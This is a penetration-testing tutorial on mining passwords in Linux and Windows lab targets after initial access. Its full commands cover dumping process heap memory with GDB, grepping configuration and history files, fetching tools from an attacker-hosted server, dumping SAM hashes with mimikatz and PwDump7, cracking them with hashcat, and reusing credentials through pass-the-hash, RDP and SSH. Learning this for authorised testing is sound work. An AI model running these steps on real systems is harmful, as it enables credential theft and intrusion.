Linux & Windows Password Mining

Password mining is the process of searching for and enumerating encrypted or clear-text passwords stored in persistent or volatile memory on the target system.

Part 1, Linux: Extract Passwords from files and Memory Heaps

While the method varies from Linux distribution to distribution, it’s crucial to have a fundamental understanding of where and how Linux stores passwords (both encrypted or clear-text). The approach heavily depends on a number of flaws in an organization’s or user’s password security procedures.

Password Security Policies are used to establish a baseline security level for user passwords and enforce the secure storage and usage which usually comprises of words, numbers, symbols and of a minimum length of 8 characters.

Because employees/users would rather rely on one “safe” complex password than to produce a new one for each account, this leads to the use of the same password for many accounts. For convenience of access, people who are obliged by company regulations to use separate passwords for several accounts are more likely to save the numerous passwords on their systems in clear-text in .doc, .txt, and .xlsx files.

Linux encrypts and stores user passwords locally; following a first penetration, user account hashes can be retrieved from memory and cracked, depending on how weak the password is. Furthermore, Linux is frequently used to host a variety of third-party business-critical applications, and these applications frequently require user access management and are vulnerable to password mining attacks because they frequently store clear text passwords in their configuration files on the server.

Prequisites:

• Debian virtual machine as my Target box
• Kali Linux as my attack box
• Familiar with various Linux shell commands

You will require initial foothold on the system. Here, I’m authenticating to the target via SSH as a standard user with no privileges.

standard bash shell

Extracting passwords from memory

We start by investigating a novel technique that depends on the target’s application type and deployment use case. Applications that use username and password authentication are permitted to keep the credentials in user-space memory (either in clear-text or encrypted). Such an application’s memory dump and analysis could turn up credentials that are relevant to it. The credentials can be used to access the service or take control of it. Since many users and administrators are prone to reuse passwords for other accounts and applications, we can also utilize the detected credentials to authenticate in other places.

To obtain clear-text or encrypted passwords, we can use the GNU Debugger (GDB) to dump the memory of a running service or application.

GDB is a portable debugger that runs on various Unix-like systems and can be used to debug various programming languages.

This technique would vary from system to sytem due to the type of application we are interacting with.

1. Finding services that are currently operating and need authentication or that may have already authenticated with other services on the target system is the first step.This can be done by running the command:

ps -ef

This displays a list of all currently active services on the target along with their associated Process Identifiers (PID). We can recognize a number of services operating as “user” in the image below. Let’s examine Bash, which is the currently active terminal…

If you have specific service in mind you would like to look up, you can manually do that by combining the grep command to limit the ‘ps’ command output to a specified term. Use command:

ps -eg | grep '<SERVICE_NAME>'

2. After identifying the bash service, let’s use the GDB tool to dump its memory in order to discover any credentials that the user may have previously entered. Use command:

gdb -p <PID>

This command is used to specify the PID of the service you want to analyze. Fom our screenshot above, Bash is runnig with a PID of 3839.

It launches you into a gdb interactive shell where subsequent commands would be entered.

3. Now we list all mapped memory regions for the process. Use GDB command:

info proc mappings

Take note of the Start Address and End Address of the Heap as selected in the screenshot.

4. We can now dump the memory of the service by specifying the start and end address of the heap allocation. Use GDB command:

dump memory <OUTPUT_FILE> <START_ADDRESS> <END_ADDRESS>

This will output the contents of the heap memory of the Bash service into a file for us to analyze. Press q to quite the debugger.

The Heap is a dynamic memory used by applications to store global variables.

5. After dumping the heap into a file, we can use the strings utility to identify potentially useful information such as credentials. Use command:

strings <OUTPUT_FILE> | grep passw

This command will identify all strings in the output file and find any occurrence of the passw keyword.

We are able to identify an authentication to the MySQL server with the username and password in clear-text.

However, the target isn’t running MySQL per Nmap scan results.

Nmap scan results

6. Alternatively, we can utilize the MySQL credentials to try and gain access via ssh since users are prone to re-suing same credentials everywhere. I’m going to try to SSH into the target with this newly discovered creds.

ssh root@<TARGET-IP>

We’ve now been able to dump and analyze the memory of an active service. This was due to:

• Password reuse by the administrator or root user.
• The MySQL authentication command included the username and the password.

When analyzing the heap output file, don’t limit your string search to ‘passw’ only, you can search for FTP, SSH, su, nano, cat, vim etc commands to see any sensitive info in these commands the user might have entered in the command line.

Searching for passwords in configuration files

Applications give attackers a wide range of options because their flaws and vulnerabilities, as well as the storage of their credentials, can result in total system compromise or privilege escalation. The method shown here changes depending on the application and on the kind of target you are dealing with. The first phase entails looking locally for passwords. Meaning that we will locate any text files or configuration files that contain user or application passwords.Searching for passwords

• We start off by finding files that contain passwords. This can be done by leveraging the grep utility.

grep --color=auto -rnw '/' -ie "Password" --color=always 2>/dev/null

--color will color code the results accordingly

-rnw means recursive search, print line number, match only whole words

‘/’ means start search from root directory

-ie means ignore case, and use patterns for matching.

This produces a large output so you can always redirect the search results to an output file to analyze later.

It is recommended to try out other keywords such as passwd, pass, passw, key, secret, etc. This is because configuration files store passwords under different names and may use abbreviated forms of the word.

• Since the search run through from the root directory, the output was massive and a bit overwhelming. We can limit the search to certain interesting locations on the Linux partition. Let’s take a look at the /etc directory.

grep --color=auto -rnw '/etc' -ie "Password" --color=always 2>/dev/null

• We weren’t able to find any useful credential in this location so we therefore turn our attention to the user account home directory.

grep --color=auto -rnw '/home/user' -ie "Password" --color=always 2>/dev/null

In a myvpn.ovpn, there’s a line which says the auth-user-pass credential is stored in a file located in /etc/openvpn/auth.txt

cat /etc/openvpn/auth.txt

The output revealed the credentials of the currently logged on user. If we didn’t know the credentials of the user beforehand, this info would have been useful.

• We can utilize the find command in conjunction with the grep utility in order to fine-tune our searches based on configs of the target.

find /etc -type f -exec grep -i -I "pass" {} /dev/null \;

This will output a list of files that contain the ‘pass’ keyword. In this case we couldn’t find any file that contained any credential we can use.

• We can search for files in the user home directory that contain the keyword “pass”

find '/home/user' -type f -exec grep -i -I "pass" {} /dev/null \;

We identify the Internet Relay Chat(IRC) client configuration file that contain the user credentials.

We can automate this process through the use of the Linux Privilege Escalation Awesome Script (LinPEAS). The LinPEAS binary can be downloaded here. After downloading, transfer it to your target.

This can be done by setting up a python web server in the directory where LinPEAS has been downloaded to.

pythom -m SimpleHTTPServer

Now that the binary is served, use the wget utility to download it to the target machine.

wget http://<ATTACKER-IP>:8000/linpeas.sh

Now give the script executable permissions before running it. Use command:

chmod +x linpeas.sh

You’ll see a change in color of the linpeas binary the next time you ls

We can now run the script with the command ./linpeas.sh

In the results, we can see it detected the openvpn auth.txt file which contains the standard user credentials.

Searching for passwords in history files

Unless otherwise specified, Linux would by default record every bash command a user entered on a system. The system administrator will benefit from being able to examine all user actions and commands using this history of commands as a foundation. Attackers may use this, if configured incorrectly, to look for sensitive data, such as credentials from earlier Linux commands kept in other history files.

• First step involves analyzing the user account Bash history file.

cat /home/user/.bash_history | grep "pass"

We are able to see a MySQL command used by the user sometime in the past.

NB: The .bash_history file only stores the history of a specific user. It doesn’t store the history of ALL users on the system. The history file can be configured in the .bashrc file also stored in the home folder of the user.

Since no MySQL server seems to be running on the target, let’s utilize the switch user command to switch to the root account with our newly discovered credentials.

su root

Alternatively, we can also use the history command to see all commands entered in the terminal.

We have been able to successfully searched for and identified locally stored credentials which we used to elevate our privileges. Check out my Windows Password Mining article here

Part 2, Windows: dump passwords stored in config files and Windows Registry

I’m gonna be honest, I used to hate Windows boxes. Usually, you’re met with a Windows remote cmd shell and after exhausting all your WinPEAS, WinES, metasploit skills, you get stuck. So I decided to take time and study a bit about Windows Privilege Escalation and this is the notes I made as I studied. Over here, I’m assuming you already have a reverse cmd shell from your Windows target. Read my Pivoting and Port Forwarding post to learn how to use Metasploit to gain foothold on a Windows system.

Target machine I’m using for this demo is Metasploitable3 which is a vulnerable Windows 2k8 R2 Server.

Now that we have established a cmd on our target machine, let’s try and enumerate all text files that contain the string “password” in them.

Use command:

findstr /si password *.txt

/s — searches for matching files in the current directory and sub-directories

/i — specifies that the search is not to be case sensitive.

findstr is a CLI tool for finding patterns of srings in a text. In our case we are saying it should find all “password” strings in all .txt on the local partition.

We jump to the beginning of the local partition and run the command so that the findstr goes through all the text files located under the C: volume.

txt files containing “Password” string

The output is large and can get overwhelming but a careful study through it would show some really sensitive info. Just like above, you can see there’s a WAMP server installed in which the password to the phpmyadmin is stored in the Documentation.txt

Other forms of the findstr command are:

findstr /si password *.xml *.ini *.txt

This will go through all .xml, .ini and .txt files for the “password” string.

findstr /si /m “password” *.xml *.ini *.conf *.txt

/m — print only the filename if the file contains the match.

The /m will limit the search results to filenames(without expanding to its contents) that only gave the search query specified.

list of files that contain the “password” string

You can perform a search for a specific string that can be found in all the files and folders

findstr /spin “password” *.* -

You can search for various strings in files by using the dir tool in cmd

dir /s *pass* == *cred* == *vnc* == *.config*

This command will list all occurence of the string specified and their locations

Cont..

Unattended Windows Setup Utility

This automates the mass installation of Windows. This tool utilizes configuration files that contain specific configurations and user account credentials that can be used by attackers to elevate privileges.

It varies from different versions of WIndows. It’s more effective when employed against organization specific environment.

The first step involves searching for the unattended setup utility config files. The filenames vary from diff versions of windows. Some of the common names are:

• Unattended.xml
• Autounattended.xml

As said already, the location to these files too vary with each version of windows. The common locations are:

C:\\Windows\Panther\Unattend\Unattended.xml

C:\\Windows\Panther\Unattdended.xmlAt times, instead of seeing Unattended.xml or attended.xml, you’d rather see Unattend.xml or attend.xml

If the configuration files exist, they might contain the Administrator password either in plaintext or encoded in base64

• Sysprep is also a utility that can be used to automate windows installation. It’s used to deploy windows image to different windows systems and can be used in conjunction with the Windows Unattended Setup utility to preparethe image for deployment.

Similarly, sysprep utilize configs that contain user credentials and customization. Also, the names of these files vary with different versions of windows.

Some known names are:

• Sysprep.inf
• Sysprep.xml

Usually located in

C:\\Windows\system32\sysprep\sysprep.xml

C:\\Windows\system32\sysprep.inf

If these configuration files exist, they offer a straightforward path to authenticate to the system as the admin user attains elevated privileges.

Windows Registry

Windows Registry is a database that contains configs and settings for windows and other applications installed on the system. We can search the registry for specific strings to reveal user credentials. Use cmd:

reg query HKLM /f password /t REG_SZ /s

and

reg query HKCU /f password /t REG_SZ /s

To interact with a registry file, use cmd

reg query <full path to registry>

This will output all registry entries that match the password string

Here I couldn’t find anything but had the user embedded their credentials under the autologon registry config, we could have interacted with that registry file to display the credentials.

Searching For Application Passwords

This will depend on the application type. The techniques demonstrated in this section will depend on the type of target you are dealing with and its deployment use case. In our case, our target virtual machine has been set up as a server and has various vulnerable applications installed on it.

During an nmap scan against our Windows 2008 R2 server, we found that it was running services:

• phpmyadmin
• wordpress
• mysqlserver

Let’s see how you can locate the configuration files used by these applications.

MySQL and Wordpress

Let’s identify the web hosting stack being used by the server. Listing the contents of the root directory shows the server is running WAMP (Windows Apache, Mysql, PHP).

Run cd wamp\www to see the type of applications being hosted.

Now listing all contents

We can see wordpress in there, being hosted as an application.

WordPress is a content management system that requires a database — in thiscase, MySQL — to store data and user credentials. It uses a remote connection to connect to the database and the access credentials are stored in the wp-config.php file. Let’s search for this file in the wordpress directory.

There it is

Now let’s read it’s content

use cmd command type to read files.

type wp-config.php

As you can see we have the MySQL user credentials and it happens that the database has no password protecting it.

Accessing SQL Database From the Attakcer’s machine.

Let’s log into the MySQL server remotely from our attack box. Use command:

mysql -u root -p -h <target ip>

Press Enter when prompted for a password. After a successful authentication, we are now connected to the SQLserver as root and we can dump any database hosted on there.Let’s start by enumerating the databases we have at our disposal.

show databases;

show DBs in the server

Select one of the DBs(wordpress in my case).

use wordpress;

selecting wordpress DB

Now let’s see the tables available under this DB

show Tables;

Tables in wordpress

Why don’t we take a look at the wp_users table.

select * from wp_users;

contents of the wp_users Table

Wow! This is getting exciting. The user passwords are encrypted in MD5 which is easy to crack.

Also, due to the fact that we have root access, we can change the admin password to a different one of our own choosing with command:

update wp_users set user_pass = MD5(“Password123!”) where ID = 1

You can now log into the wordpress admin panel with the credentials.

Now you have total control of MySQL and the Wordpress site.

Accessing the SQL database through the web

A simple Nmap service scan showed many HTTP services running on the Target. I tested all the ports in the browser till I got to port 8585.

I was greeted with the WAMP server homepage.

It had links to phpmyAdmin, mysql and Wordpress.

So I went with the sqlbuddy since it had SQL in its name.

I was met with an login panel. Since from the config file, the mySQL server allows no password login with the root user, I authenticated as root without a password and I was successfully logged in.

You can see the DBs lined up on the left. Let’s take a look at the wordpress DB

Taking a look at the wp_user table

On the left, there’s the Query menu which gives you a field to manually enter mySQL queries to alter the DBs. Use that to alter the admin password.

phpMyAdmin

We can gain access to the control panel of phpMyAdmin by locating and reading the contents of the configuration file. The config file is located in:

C:\wamp\apps\phpmyadmin3.4.10.1\config.inc.ini.php

phpmyAdmin config file

Let’s read it.

type config.inc.php

content of config file

You can see the credentials to the phpmyadmin panel are stored in the file which also allows a passwordless login as well.

Using the link on the WAMP server homepage, we open phpmyAdmin and we are met with a login screen.

With username of root and no password, we are logged in. We should now have root access to the phpMyAdmin control panel and be able to create, modify, and delete the contents of databases.

phpmyAdmin

Dumping Windows hashes

Before I continue, let’s take a look at how Windows stores it’s Hashes.

SAM Database

Security Accounts Manager(SAM) is a database that manages users and their passwords on windows. Each password stored in the SAM file is hashed. Authentication and Verification of user credentials is done by the Local Security Authority (LSA).

SAM file is stored in the Windows Registry:

HKEY_LOCAL_MACHINE\SAM

Now that we’ve seen where windows hashes are stored, Let’s take a look at some password encryption types Windows employs.

LM and NTLM Hashing

LM is a weak authentication protocol that can easily be cracked, This is how it encrypts its passwords:

• The password is converted into a hash by breaking it into two seven-character chunks.
• All characters are then converted into uppercase.
• Each chunk is then encrypted with a 56-bit DES key.

This makes it weak because:

• The 56-bit DES key is weak and can be cracked relatively easily.
• Because the characters are converted into uppercase, this makes the cracking process relatively simple through a brute-force or dictionary attack.
• Versions of Windows that utilize LM are restricted to a maximum of 14 characters for user account passwords.

Let’s take a look at NTLM

NTLM was supposed to be an improvement of LM. NTLM authentication operates under the client-server model of communication and involves a handshake process, similar to the TCP three-way handshake.

NTLM operates under a challenge response system, and the hashing process can be broken down into the following steps:

• When a user account is created, it is encrypted using the MD4 hashing algorithm, while the original password is disposed of.
• During authentication, the username is sent to the server. The server then creates a 16-byte random string and sends it to the client. This is known as the challenge.
• The client encrypts the string with the password hash using the Data Encryption Standard (DES) algorithm and sends it back to the server. This is known as the response.
• The server then compares the hashed string (response) to the original. If it matches, authentication is completed.

PwDump7

PwDump7.exe is a binary that extracts the SAM file and dump the hashes. It needs to be ran locally on the victim’s computer. So you upload it to the victim machine and execute.

The SAM and SYSTEM file can be easily located in

C:\Users\Windows\system32\config\

SAM & SYSTEM files

Setting up a temporary Python server on my attack box, to serve the binary to the windows machine

sudo python -m SimpleHTTPServer

serving the files

NB: Make sure to transfer the libeay32.dll library file along with the binary to the windows machine

Now downloading it to the windows machine

certutil.exe -f -URLcache http://<attacker ip>:8000/PwDump7.exe PwDump7.exe

downloading served binary

Now the library file

certutil.exe -f -URLcache http://<attacker ip>:8000/libeay32.dll libeay32.dll

downloading served library file

Now we have our two files(binary + dll file) on the target windows machine

Let’s save the SAM file to the C:\ drive

reg save hklm\sam C:\sam

saving SAM file

Save the SYSTEM file also

reg save hklm\SYSTEM C:\system

saving SYSTEM file

Now run PwDump7.exe with the saved SAM file and the SYSTEM file to extract the hashes.

PwDump7.exe -s C:\sam C:\system

dumping hashes stored in SAM file

NB:You can run the PwDump7.exe alone to still dump the hashes without having to save the SAM file registry entries.

SamDump2

Samdump2 is a linux tool used to extract the hashes from a hash file.

We can save the registry value of our SAM file to our target locally with command:

reg save hklm\sam C:\sam

save SAM file

Now we download the saved files unto the attack box and use

download the SAM & SYSTEM files to the attacker machine

Now on your attack box, run samdump2 with the SAM and SYSTEM file

extract hashes from the SAM & SYSTEM file

Hashdump

This is a metasploit command that dumps all users and their hashes if executed with the right permissions.

hashdump

Utilizing Windows Credentials Editor

wce.exe (comes prepackaged with Kali) is a windows binary that list the logon sessions and their corresponding NTLM hashes.

From our attack box, let’s serve the binary for download.

serve the binary

Now let’s download it to the windows target

download it to the target

Now you run it

wce64.exe

With this, you’re only able to dump the hashes of currently logged on users.

You can also dump the plain-text of the hashes with wce with the command:

wce64.exe -w

plain-text dump

Credential Collector Metasploit post-module

Use post/windows/gather/credentials/credential_collector

set session to your current active session and run

dumping hashes

Mimikatz

We can talk about dumping credentials without talking Mimikatz. It’s a credential dumping tool when executed with the right privileges. It’s not limited to credential dumping only as it has other useful purposes such as token impersonation.

Even though we can load it from its metasploit module, I’m choosing to go the long way of manually uploading it and executing it.

It also comes prepackaged with Kali (located in /usr/share/windows-resources/mimikatz directory) so I’m going to host the entire x64 binary folder together with its dependencies for download.

Downloading on the windows machine

Now run mimikatz.exe on the target machine

launch mimikatz

Run token::elevate to elevate your permissions since you need high permissions to access the SAM file.

elevate permissions

Now dump the SAM file hashes with command lsadump::sam

dump hashes

Cracking Windows hashes

We have been able to dump the user account hashes, aside wce64.exe which was able to dump the plaintext format of the logged on users passwords, the other tools could only dump the hashes. In this section, I’m going to demonstrate how you can utilize some Open source tools to crack these hashes.

Structure of a typical windows Hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::

<username>:<RID>:<LM>:<NTLM>

John The Ripper

It’s an open source password security, auditing, and recovery utility that supports a large number of hashes and ciphers. We will start by saving all our password hashes into a txt file I’ll call hashes.txt

The content of hashes.txt should be similar to this

hashes.txt

Now we run John the ripper with the command:

sudo john — format=NT hashes.txt

This will run with John’s default password wordlist. You can specify your own wordlist with the — wordlist tag)

cracking the hashes

It starts to crack the password hashes one after the other. Depending on the list of hashes and the complexity of the hashes, John can take longer hours(or days even) to crack the hashes. So it’s better to always limit it to the hashes of interest only.

Hashcat

Another password cracking tool which is my favorite actually. With the same hashes.txt, run it with hashcat together with the rockyou wordlist.

hashcat -a 0 -m 1000 hashes.txt <wordlist>

hashcat

• -m=This is the mode of the hash. NTLM hashes have a mode of 1000
• -a= This means attack mode. And 0 means Straight attack, meaning just crosscheck with each word in the wordlist as it is without any complex combinations.

Now what can you do with these set of credentials after cracking them?

Authentication

Here, I’m going to show you how you can use the newly found credentials to authenticate against the target to obtain privileged access. There are various techniques but I’m going to highlight a few ways.

Pass-the-Hash

Let’s say you’re finding it difficult to crack the hash, you can authenticate with the target using the dumped hashes without knowing the plain-text form. I’ll be utilizing one of impackets tools called Psexec

Psexec is a tool used to authenticate to windows machines, can be used to pass the hash too.

It has a module embedded in metasploit.

useexploit/windows/smb/psexec

Set the required options (SMBUser, SMBPass(hash), RHOSTS most importantly)

Now you get a meterpreter session as the Adminstrator.

Remote Desktop Protocol (RDP)

John cracked the hash of Administrator as ‘vagrant’. Let’s try to see if RDP is enabled on the windows target and if so, can we authenticate.

RDP runs on port 3389. An nmap scan revealed port 3389 to be open

RDP open

xfreerdp /u:<username> /p:<password> /cert:ignore /v:<taget ip> /dynamic-resolution

We successfully RDP’d into the target with the admin credentials. We have control of the Domain.

SSH

If the target has any form of ssh server installed on it, you can SSH into it with any valid pair of credentials. From hashcat, we saw that the password of c_three_pio was pr0t0c0l. Let’s see if we can SSH into the system.

ssh <username>@<target ip>

After typing the password, we get a cmd shell